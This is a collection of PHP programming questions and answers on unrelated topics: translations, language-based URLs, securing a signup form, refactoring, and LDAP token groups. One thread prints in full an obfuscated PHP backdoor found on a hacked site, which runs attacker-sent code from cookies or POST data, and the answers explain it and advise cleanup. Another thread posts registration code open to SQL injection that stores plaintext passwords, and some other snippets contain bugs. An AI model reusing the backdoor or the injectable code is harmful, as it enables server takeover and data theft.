I'm using the following function to store user messages in two languages in javascript:
function user_messages(es_ES, en_EN)
{
this.es_ES = es_ES;
this.en_EN = it_IT;
}
var um_duplicated_input = new user_message('Contenido duplicado','Duplicated content');
It may not be the best practice but is being really handy for me to get user messages in my code by language, using the locale value. I would like to know how to achieve something as simple to declare and handle in PHP instead building new arrays all the time. Been looking at stdclass but can't get it to work properly.
Despite the help of people like Alex Blex who rather prefer to question user's legitimacy instead helping them. Here is a working approach for those who may be looking in future for something similar (which I was thinking was the main purpose of this site) It could surely be better but I don't know how to make it simpler or smarter.
class internal_message
{
public $message = array();
public function setMsg($index, $newval)
{
$this->message[$index] = $newval;
}
public function getMsg($index)
{
return $this->message[$index];
}
}
This way, you have to do a new declaration for every language, but in fact it is more safe and clear. I'm starting to feel really disappointed about this site, specially regarding topics like the english language quality of the posts: in my case, I'm Spanish, from Spain, and I dare you to speak as good Spanish as I do speak English. I also speak Deutch and Catalan. But this is not a place for languages, in fact, if somebody misspells something it will enrich your database with a content that somebody will also misspell when searching in Google.
I don't understand all this classism and attitude in recent times.
$error_message_wrong_pass = new internal_message;
$error_message_wrong_pass->setMsg("es_ES", "Password incorrecto");
$error_message_wrong_pass->setMsg("es_ES", "Wrong Password");
//To print them out
$error_message_wrong_pass->getMsg("es_ES");
Related
Hi everybody and tks in advance for your help!
I have a multilengual site made in a similar way to this example. Everything is working just fine, but now I want to make that the URL change according to the languague selected. For example, if my page is called perfil.php when I select english languague, should be profile.php, and all the links in the web should translate to english too. I was surfing another questions but the majority offers a solution through htaccess. This should work, but I need to store that configuration (or translations) into my database so the user can change it when they want to.
Any ideas?
Thank you again!
You can use constants in some files called language files and then require/include them by language selected:
english.php
const PROFILE = "profile";
spanish.php
const PROFILE = "perfil";
main file:
require $language_selected . ".php";
echo '<a href="' . PROFILE . '.php">';
This part should be a comment (but its a bit long)
The method described in the link you provided is a reasonable way to implement the choice of language, but a poor way to detect the choice.
Your browser already tells servers what language(s) it thinks they should respond in. And most webservers have a mechanism for multiplexing different language content. However the latter means hard-wiring the choice of the browser without providing an easy means for overriding the behaviour.
The approach I have used before is something like this:
$use_lang='en-GB';
if (isset($_COOKIE['userlang'])
&& is_language_supported($_COOKIE['userlang'])) {
$use_lang=$_COOKIE['userlang'];
} else if ($proposedlang=supported_lang_in($_SERVER['Accept-Language'])) {
$use_lang=$proposedlang;
}
function supported_lang_in($str)
{
$l=array();
$opts=explode(',', $str);
foreach ($opts as $v) {
list($p, $weight)=explode(';', $v);
if ($weight) {
list($dummy, $weight)=explode('=', $weight);
$weight=float($weight);
}
if (!$weight) {
$weight=1.0;
}
if (isset($l[$weight])) {
$weight-=0.001;
}
$l[$weight]=$p;
}
krsort($p); // preferred first
foreach ($p as $proposed) {
if ('*'==$proposed) {
return false;
}
if (is_language_supported($proposed)) {
return $lang;
}
}
return false;
}
Now on to the problem you asked about....
Maintaining different URLs to reference the same content then dereference the language within the content seems a very byzantine solution to the problem. Not only do you have to map the input to the URL but you need to rewrite any URLs in the output to the appropriate representation.
While having semantically meaningful URLs is a definite bonus, going to great length to tailor these dynamically is not perhaps not the best use of your time.
I am sorry to ask a silly question but I am not able to figure this out. I found a PHP file in my root directory with strange code. I know little bit PHP but this is a very strange code inside the PHP code. I am sure that it is not PHP functions. I don't know what is this code about.
Is my website compromised? Can some tell me that they can do with my website through this code. I am raising this question here because maybe this can help some one to save their websites.
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
$GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]] = $GLOBALS['t7004'][61].$GLOBALS['t7004'][4].$GLOBALS['t7004'][59];
$GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][79];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][53].$GLOBALS['t7004'][59].$GLOBALS['t7004'][92].$GLOBALS['t7004'][55].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][6].$GLOBALS['t7004'][77].$GLOBALS['t7004'][6].$GLOBALS['t7004'][2].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][32].$GLOBALS['t7004'][4].$GLOBALS['t7004'][32].$GLOBALS['t7004'][72].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][84].$GLOBALS['t7004'][77].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]] = $GLOBALS['t7004'][43].$GLOBALS['t7004'][56].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][2].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][6].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][49].$GLOBALS['t7004'][75].$GLOBALS['t7004'][41].$GLOBALS['t7004'][10].$GLOBALS['t7004'][62].$GLOBALS['t7004'][13];
$GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]] = $GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][71].$GLOBALS['t7004'][13].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] = $_POST;
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] = $_COOKIE;
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74], NULL);
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83], 0);
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][52].$GLOBALS['t7004'][56].$GLOBALS['t7004'][64].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][64].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][84].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55], 0);
#$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]](0);
$rcc6ec6 = NULL;
$e6ca3e0 = NULL;
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][29].$GLOBALS['t7004'][10].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][10].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][61].$GLOBALS['t7004'][10].$GLOBALS['t7004'][56].$GLOBALS['t7004'][85].$GLOBALS['t7004'][55].$GLOBALS['t7004'][0].$GLOBALS['t7004'][71].$GLOBALS['t7004'][61].$GLOBALS['t7004'][55].$GLOBALS['t7004'][13].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][85].$GLOBALS['t7004'][0].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][75].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][71].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][55].$GLOBALS['t7004'][29];
global $c6278d728;
function f7684f5ee($rcc6ec6, $r8c6)
{
$ua52559 = "";
for ($o4b1=0; $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6);)
{
for ($b1ad67b=0; $b1ad67b<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($r8c6) && $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6); $b1ad67b++, $o4b1++)
{
$ua52559 .= $GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]]($GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($rcc6ec6[$o4b1]) ^ $GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($r8c6[$b1ad67b]));
}
}
return $ua52559;
}
function y10245($rcc6ec6, $r8c6)
{
global $c6278d728;
return $GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($rcc6ec6, $c6278d728), $r8c6);
}
foreach ($GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] as $r8c6=>$ob6137983)
{
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
}
if (!$rcc6ec6)
{
foreach ($GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] as $r8c6=>$ob6137983)
{
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
}
}
$rcc6ec6 = #$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]]($rcc6ec6), $e6ca3e0));
if (isset($rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]]) && $c6278d728==$rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]])
{
if ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][6])
{
$o4b1 = Array(
$GLOBALS['t7004'][32].$GLOBALS['t7004'][72] => #$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]](),
$GLOBALS['t7004'][83].$GLOBALS['t7004'][72] => $GLOBALS['t7004'][75].$GLOBALS['t7004'][9].$GLOBALS['t7004'][41].$GLOBALS['t7004'][0].$GLOBALS['t7004'][75],
);
echo #$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]]($o4b1);
}
elseif ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][55])
{
eval($rcc6ec6[$GLOBALS['t7004'][79]]);
}
exit();
}
(I'm not able yet to answer)
I had similar code on a customer website with a joomla install, several times.
If your webhost hasn't a code-checker were it blacklists hacked files, you should have to search the whole public_html directory.
I had one recent case where the code included several new files in a wordpress install, across different folders and some hidden with even meaningful names. I had to go thorugh every folder and check files with the same date (the hacking date - last modification) and go through each one to check if it was completely malicious code or just partly.
But usually I radically delete sections and files with encrypted code, they generally are hacked files...
The code you have posted is obfuscated PHP. The string at the beginning with all the \x 's in it is a hex representation of a string.
There is a neat site named "DDecode" I found here: Hex Decoder which will attempt to do exactly what it says.
Plugging your code into that site we can see that the first part:
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
becomes:
<?php ${"GLOBALS"}['t7004'] = "-#_]hEi:\xa.29`5D\x9Yj{P\xd}W+)S~V7HFp|INR%&BZ0*bQ/<3MyT;mt"eaqor^c4[xwOXCG#fvAg1=nLdU?$su6(>!z8,lK'kJ\";
I am not super familiar with PHP myself, however we can see that a variable is being set here to a long, apparently random string. From there we can look at the rest of the code and see that it is almost entirely a series of references back to this initial string. In this way the attacker has hidden what their code is doing by making it appear nonsensical, which is the point of obfuscation of course.
You could take the time to dereference all of those calls if you wanted to try and get a better idea of what the code is doing. Also there may be some security researchers who would be interested in seeing this code and could possibly give you more insight into what it is doing.
As for the state of your website - if you didn't do this then yes, the chances are highly likely it has been compromised and you should at a minimum, as the comments suggested:
roll back to a clean, known good version
update your host with any applicable patches
INFORM YOUR USERS! Especially since you are unsure what this code does it is important to let your users know that your site has potentially been compromised so they can take the appropriate actions.
I want to make the code really secure for the users. The code below shows the php code that
I have used it for my website. Right now I have used some validation such as password and repeatPassword has to match and the users has to input all the fields.
To make it more secure, I want to insert secure command such as PDO, mysqli, crypto or MD5
But I do not know how to since I have new to php.
How can i do this ?
My Code is here :
<?php
include"config.php";
if (isset($_POST['submit']))
{
$user_name = $_POST['name'];
$user_surname = $_POST['surname'];
$user_email = $_POST['email'];
$user_academic = $_POST['academic_institute'];
$user_username = $_POST['username'];
$user_pass = ($_POST['password']);
$user_pass2 = ($_POST['repeatPassword']);
if($user_name && $user_username)
{
if($user_pass==$user_pass2)
{
$query = mysql_query("INSERT INTO members (name, surname, email, academic_institute, username, password, repeatPassword)
VALUES ('$user_name', '$user_surname', '$user_email', '$user_academic', '$user_username', '$user_pass', '$user_pass2')");
mysql_query($query);
echo '<script type="text/javascript">alert("You have been registered");</script>';
}
else
{
echo '<script type="text/javascript">alert("Password must match");</script>';
}
}
else {
echo '<script type="text/javascript">alert("All fields required");</script>';
}
}
?>
Not a "true" answer, but too long for the comment section, so I'll migrate it to an answer:
My original comment (slightly improved)
You probably want to start with: How can I prevent SQL injection in PHP?
And then continue with: Secure hash and salt for PHP passwords.
And then you want to fix your code style. Well-styled code is easier to read. Easy to read code is easier to understand. And the better you understand code, the better you can reason about security (or, indeed, correctness in general).
Also make sure you serving the site over an SSL connection.
Your reply
#Carpetsmoker, Can you quickly edit my code and try to make it secure. I read the links you gave it to me. Since I am new to php, I am struggling to understand. If you have time can you please quickly edit my code. Thank you –
And my reply to that
I'm sorry, but no :-)
This is not a 'Please write my code'-site, you really have to do it yourself.
Don't get me wrong, I really appreciate that this task can be daunting, and that you're struggling to grasp all the concepts. I've did plenty of struggling, and still do on occasion, but (unfortunately) this is part of the learning process. I know of no other way of doing it.
First, remember those two links are just starting points which point out what you can improve. Feel free to do more research, search the internet, etc.
Second, Fix one thing at a time. So first concentrate on the SQL problems, when you sorted that, go ahead to the password hashing, when you sorted that, move on to SSL.
Your reply came about 15 minutes after my comment; you should expect to invest several days into this, this is not a simple problem you can fix with a simple line of code. You will need to grasp deeper concepts if you want to do it correctly.
Keep at it! Don't lose hope! All programmers struggle! And if you have problems/can't figure something out, don't be afraid to ask more (specific) questions on StackOverflow. And remember, at the end of all of this, you will be a better programmer. These few days of investment will benefit you for life!
i have this process that is the heart of my app, that im creating, but for some reason i feel like its the worst way to do it(instinct) , and i wanted to see if thier is something wrong with this process, and am i approaching it in a bad way! p.s. the code works fine, just refactoring problem.
the process is:
users go to homepage, they see thier latest activities, by other site memebers(home.php),
//function to bring the latest activities from database
$results=function getUserUpdates($_SESSION['user_id'];
while($row = mysql_fetch_array($results))
{
//another function to format the activities in a social stream
echo formatUpdate($row['user_note'],$row['dt'],$row['picture'],$row['username'],$row['id'],$row['reply_id'],$row['reply_name'],$row['votes_up'],$row['votes_down']);
}
i have put the function codes in pastie.
formatUpdate function http://pastie.org/1213958
getUserUpdates function http://pastie.org/1213962
EDIT both functions are from different files they are included in home.php,
formatUpdate from functions.php
getUserUpdates from queries.php
First of all, it's good that you have separate functions for getting the data and for formatting the data. It's a good start toward refactoring your code. It makes it easier in the future: if you ever want to format your data differently, you can just expand your formatter.
Second, this is what coreyward meant by a lambda:
$results=function getUserUpdates($_SESSION['user_id'];
Remove the function keyword. You use function when you're defining a function. But here you're only calling one. (You defined it in queries.php.)
Third, I agree with webbiedave about the echo statements. A good way to avoid that: In the "heart" of your app, collect all the HTML into one place. Then, when you've collected everything you're going to display on the page, you can echo it all at once. This makes it a lot easier to keep track of what you're doing, and to remember the order of everything. It also makes it easier to add headers and footers, or do more formatting. Otherwise, if you have echo statements scattered around your code, it's a lot easier to let something slip that shouldn't be there.
Here's a very basic example of what I mean:
$html = '';
$results = getUserUpdates($_SESSION['user_id'];
while($row = mysql_fetch_array($results)) {
$fields = array(
'user_note' => $row['user_note'],
'dt' => $row['dt'],
'picture' => $row['picture'],
'username' => $row['username'],
'id' => $row['id'],
'reply_id' => $row['reply_id'],
'reply_name' => $row['reply_name'],
'votes_up' => $row['votes_up'],
'votes_down' => $row['votes_down'],
);
$html .= formatUpdate($fields);
}
// This way you can do whatever you want to $html here.
echo $html;
Also notice that I put all the fields from $row into an array and passed it to formatUpdate(). That has two advantages:
It's easier to read.
If you ever
want to change the fields that
formatUpdate deals with, you don't
have to worry about searching
through your code to change the
arguments every time you call it.
Firstly, I think you mean:
$results = getUserUpdates($_SESSION['user_id']);
In your getUserUpdates() function there is a redundant branch:
if ($username == $_SESSION['u_name']){
// return something
}
if ($username != $_SESSION['u_name']){
// return something else
}
You don't need the second if statement as any code run at that point will only be run if $username != $_SESSION['u_name'].
In my opinion, it's usually better not to have different functions directly echoing HTML up the stack (such as echoVote()). It's preferred to have functions return data and have the original caller echo it. This allows the caller to perform additional data massaging if desired.
Other than that, your code is fetching data, looping through and acting on the results which is pretty much standard fare.
I think your instinct is to be a little too harsh on yourself ;) There are improvements to be made but it's certainly not the worst way to do anything.
Greetings,
I already have a working connection to the AD and can search and retrieve information from it. I've even developed a recursive method by which one can retrieve all groups for a given user. However, I'd like to avoid the recursion if possible. One way to do this is to get the tokenGroups attribute from the AD for the user, which should be a list of the SIDs for the groups that the specified user has membership, whether that membership be direct or indirect.
When I run a search for a user's AD information, though, the tokenGroups attribute isn't even in it. I tried specifically requesting that information (i.e., specifying it using the fourth parameter to ldap_search) but that didn't work, either.
Thanks,
David Kees
Solved my own problem and thought I'd put the answer here so that others might find it. The issue was using the ldap_search() function. The answer was to use the ldap_read() function instead of ldap_search(). The difference is the scope of the request. The search function uses a scope of "sub" (i.e., subtree) while the read function uses "base." The tokenGroups information can only be found when using a scope of "base" so using the correct PHP function was the key.
As I mentioned above, I was working from someone else code in perl to create my solution and the perl script used a function named "search" to do it's LDAP requests which lead me down wrong path.
Thanks to those who took a peek at the question!
--
As per the requests in the comments, here's the basics of the solution in code. I'm extracting from an object that I use so this might not be 100% but it'll be close. Also, variables not declared in this snipped (e.g. $server, $user, $password) are for you to figure out; I won't know your AD credentials anyway!
$ldap = ldap_connect($server);
ldap_bind($ldap, $user, $password);
$tokengroups = ldap_read($ldap, $dn, "CN=*", array("tokengroups")));
$tokengroups = ldap_get_entries($ldap, $tokengroups);
At this point, $tokengroups is our results as an array. it should have count index as well as some other information. To extract the actual groups, you'll need to do something like this:
$groups = array();
if($tokengroups["count"] > 0) {
$groups = $tokengroups[0]["tokengroups"];
unset($groups["count"]);
// if you want the SID's for your groups, you can stop here.
// if you want to decode the SID's then you can do something like this.
// the sid_decode() here: http://www.php.net/manual/en/function.unpack.php#72591
foreach($groups as $i => &$sid) {
$sid = sid_decode($sid);
$sid_dn = ldap_read($ldap, "<SID=$sid>", "CN=*", array("dn"));
if($sid_dn !== false) {
$group = ldap_get_entries($ldap, $sid_dn);
$group = $group["count"] == 1 ? $group[0]["dn"] : NULL;
$groups[$i] = $group;
}
}
}
That's the basics. There's one caveat: you'll probably need to work with the individual or individuals who manage AD accounts at your organization. The first time I tried to get this running (a few years ago, so my memory is somewhat fuzzy) the account that I was given did not have the appropriate authorization to access the token groups information. I'm sure there are other ways to do this, but because I was porting someone else's code for this specific solution, this was how I did it.